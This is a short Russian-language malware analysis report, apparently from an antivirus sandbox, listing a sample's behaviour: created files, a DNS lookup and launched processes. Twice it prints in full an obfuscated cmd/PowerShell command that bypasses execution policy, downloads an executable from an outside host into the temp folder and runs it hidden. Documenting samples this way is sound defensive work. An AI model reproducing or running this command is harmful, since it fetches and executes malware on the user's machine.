Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://y9k4.top/http/ как $uytcccs
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c P^owerSh^ell -ExecutionPolicy ByPass -NoProfile -command $uytcccs=$env:temp+'\3bs2.exe';(Ne^w-Objec^t Net.We^bCli^e^nt).DownloadFile('http://y9k4.top/http/',$uytcccs);Start-Process $uytcccs
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1888
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1320595.cvr
Сетевая активность
UDP
- DNS ASK y9##.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c P^owerSh^ell -ExecutionPolicy ByPass -NoProfile -command $uytcccs=$env:temp+'\3bs2.exe';(Ne^w-Objec^t Net.We^bCli^e^nt).DownloadFile('http://y9k4.top/http/',$uytcccs);Start-Process $uytcccs' (со скрытым окном)
